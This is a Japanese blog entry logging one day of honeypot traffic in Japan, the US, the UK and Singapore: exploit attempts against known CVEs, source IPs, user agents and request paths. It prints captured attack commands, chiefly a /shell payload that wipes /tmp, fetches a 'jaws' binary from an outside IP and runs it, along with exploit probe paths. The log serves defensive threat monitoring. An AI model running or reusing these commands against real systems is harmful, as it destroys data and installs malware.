2023/04/21 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/04/21分です。

特徴

共通

CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

Location:US

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:UK

F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 167.71.210.63/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：173 (前日比：24)
US：総アクセス数：97 (前日比：-62)
UK：総アクセス数：142 (前日比：-131)
SG：総アクセス数：140 (前日比：3)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	4.14.70.9	United States
4	4.17.224.132	United States
2	20.55.58.5	United States
6	34.94.1.251	United States
43	39.103.194.15	China
19	43.154.141.71	Singapore
1	45.56.108.128	United States
1	45.79.172.21	United States
1	45.79.181.251	United States
1	60.2.120.26	China
2	62.210.207.17	France
2	64.85.173.196	United States
2	65.132.186.86	United States
2	67.21.36.5	United States
2	89.114.94.207	Portugal
1	103.83.81.23	India
1	103.169.35.140	Vietnam
1	104.192.0.50	United States
1	106.75.136.16	China
2	109.237.97.180	Russia
1	134.209.32.175	United States
16	135.125.244.48	France
1	162.243.134.20	United States
1	162.243.146.36	United States
7	167.99.202.220	United States
2	167.248.133.36	United States
3	168.80.174.2	Seychelles
6	170.64.180.254	United States
2	171.234.151.84	Vietnam
1	172.104.11.46	United States
2	172.104.11.51	United States
1	172.104.127.124	United States
3	172.105.128.13	United States
1	175.107.0.253	Pakistan
1	181.214.242.56	United States
2	185.254.196.173	Ukraine
2	188.119.51.126	Turkey
2	190.213.155.143	Trinidad and Tobago
4	193.32.162.159	Romania
12	194.37.80.117	Gibraltar
1	198.199.104.98	United States
1	205.210.31.14	United States
1	206.189.130.194	United States
2	212.154.7.246	Turkey
2	216.218.206.66	United States

UserAgent一覧

件数	UserAgent
82	`-`
1	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
19	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX)`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.3`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
44	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPod; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_18.179.20.5_80\n`
1		`\x05`
1		`\x16\x03\x01\x01H\x01`
15		`\x16\x03\x01`
1		`\xb5\xe9\xc8\xfdJ\x167\x02\xd3\x91\xfbk\xba\x97U\xf9\n`
1	GET	`/%20-%20.env`	HTTP/1.1
1	GET	`/%20-%20Copy.env`	HTTP/1.1
1	GET	`/%21.env`	HTTP/1.1
1	GET	`/-%20Copy.env`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//MyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//myadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//pma/scripts/setup.php`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blob/.env`	HTTP/1.1
1	GET	`/client/.env`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/copy.env`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
4	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/dist/index.html?v=82ba4a`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/maintenances`	HTTP/1.1
1	GET	`/muieblackcat`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
2	GET	`/upl.php`	HTTP/1.1
1	GET	`/uploads/.env`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
19	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/admin`	HTTP/1.1
1	POST	`/apps`	HTTP/1.1
1	POST	`/audio`	HTTP/1.1
1	POST	`/backend`	HTTP/1.1
1	POST	`/base`	HTTP/1.1
1	POST	`/client`	HTTP/1.1
1	POST	`/crm`	HTTP/1.1
1	POST	`/protected`	HTTP/1.1
1	POST	`/public`	HTTP/1.1
1	POST	`/uploads`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	4.154.42.162	United States
1	5.188.210.227	Russia
3	20.55.58.5	United States
1	45.33.80.243	United States
1	45.55.0.6	United States
2	45.79.181.94	United States
2	45.79.181.104	United States
1	45.79.181.223	United States
2	45.227.254.19	Belize
18	54.37.79.75	France
1	64.62.197.137	United States
1	64.62.197.148	United States
3	67.21.36.5	United States
1	92.255.85.183	Hong Kong
4	95.214.235.216	Ukraine
2	103.187.190.54	private ip address
2	103.187.190.57	private ip address
1	104.28.195.187	United States
1	107.170.239.9	United States
1	115.48.138.241	China
7	137.184.20.193	United States
2	152.89.196.54	Russia
2	152.89.196.211	Russia
1	159.100.30.51	Germany
2	167.248.133.51	United States
1	172.104.11.4	United States
2	172.104.11.46	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
2	179.43.177.243	Panama
6	185.77.217.9	Russia
4	185.142.236.41	Seychelles
1	185.180.143.188	Portugal
1	192.241.203.202	United States
9	193.32.162.159	Romania
2	193.56.29.26	United Kingdom
1	194.87.151.116	Czechia
1	198.235.24.18	United States
1	205.210.31.144	United States

UserAgent一覧

件数	UserAgent
28	`-`
8	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
3		`\x03`
1		`\x05\xa4`
16		`\x16\x03\x01`
1		`\x1d\x92s\xe7\xe2m\x8c\x18$\xe7\xce;\xd39J@\x8b\x11\xe1\vQ\xf6\xbca>k@\xe5\xe0P\x8bq\xfaTZ5\x07\xb7=>3u%\xe1\b\x15>t\xa4!\x1b\x19\x82P\xd6\xa3\xa9\xaf\xbd\x9e?\xe5E%\x16\xf8uT\xc0\x1c\xae\xc5[\xf2c\x87\x12\xf6\xa0\x97\x80ZQ\xff2\x0e\xd1\x99<\xe6\xfa\x16\xb1V\xfa\xf8\v\x80\x94\xaf\xe584\x85N\x8ba\xbb\xc4h\xcb8s\x91\xd1f\x07u\x97\xd3\xfe\xe98-r\xa1\x15&\xac\x81x\x11\x1e<~\xf5\x1dj\x92:\xfe\xc8#g/\xe6f\x18`c\x12l\xcf\xe6\x05\x0e\x05`
1		`n\xad\x1b\xac\x91R\xe4SZ7X\xddFFO\xd9m=O\x90\xc1\xb5\t\xda\n`
29	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
9	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/nmaplowercheck1682000685`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	HEAD	`/config.json`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.118.186.103	United States
1	27.124.12.16	Singapore
2	45.79.181.104	United States
2	45.79.181.179	United States
45	47.106.210.38	China
22	54.37.79.75	France
1	64.62.197.34	United States
1	64.62.197.37	United States
2	67.21.36.5	United States
5	74.207.251.114	United States
4	90.151.171.106	Russia
2	91.109.176.12	France
4	95.214.235.216	Ukraine
1	107.170.233.4	United States
2	152.89.196.54	Russia
2	152.89.196.211	Russia
7	152.136.194.70	China
7	165.232.180.212	United States
2	167.94.138.52	United States
4	172.104.11.34	United States
1	172.104.97.232	United States
3	172.105.128.12	United States
1	179.43.177.243	Panama
1	180.149.125.163	Mongolia
1	183.136.225.5	China
1	185.141.110.139	Turkey
1	192.155.90.220	United States
1	192.241.216.8	United States
1	192.241.230.17	United States
1	192.241.238.4	United States
9	193.32.162.159	Romania
2	194.87.151.116	Czechia
1	198.235.24.28	United States
1	208.67.105.145	United States

UserAgent一覧

件数	UserAgent
74	`-`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
31	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`\x05`
1		`\x16\x03\x01\x02`
16		`\x16\x03\x01`
1		`\xb3_\x8d\x80L\xa0r\x7f\xbf\x1a\x01g(\x8f\x0c\xa9\xe78\x04\x9f\x9d&i\"\r\xea\x10\x88\xa6\xa0\x13\x8b\xb6\xb3({4p\xa6\xa6\x94G\xb1\x9b\xa8\xc3\xc7\x96I1Db\x8d\x12a\xe512Mw6\x8e\x10\x8c=8qV\xf8\"\xf7y\\\x93\x96\xff\x87\xf5\x86./\xe5S\x9f\x7f\r\xe3\xa6X\x9c\t\xa2\x80\xfb0e\x96\x17\x11}\x80\xca\x9e\xc7\x91=W\xa5\xe2\x0f\xb4\x07\xaa\xff\xd7-\xe8\x9c`	\xcew\xcf\xd4'\x96\xc8\x89rc\xbb\xe7>\xb6%\xb6\xa4u\x9d\x10\x16\xf8a3\xa8\xde\x03\x87\xb2\xab\xb6\xc85\xe0\xdc\xb4\xb7\x8f\xac31\xd6w\xe0\xb9?\xbbTLH\x10\x06#W>#2\xf2\xc8_\x1e\x0c\x19g\xdb\xd3\x83\x14oE.\xf9\x18\xcb\x1e`\x16\x87r\xae\xac\xb66Z\x0f=\xd3rD\x85\x8dO$\x9b\x1a\xa2G\x93\x0f\x02\xa5\x18hU\xcc\xe0\r\xd8\n
1	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
1	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
32	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//.env`	HTTP/1.1
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
2	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/c/`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
9	GET	`/dispatch.asp`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vodhtml/98360.html`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z72612114222Q1`	HTTP/1.1
1	GET	`http[:]//ip[.]bablosoft[.]com/?Z72612114222Q1`	HTTP/1.1
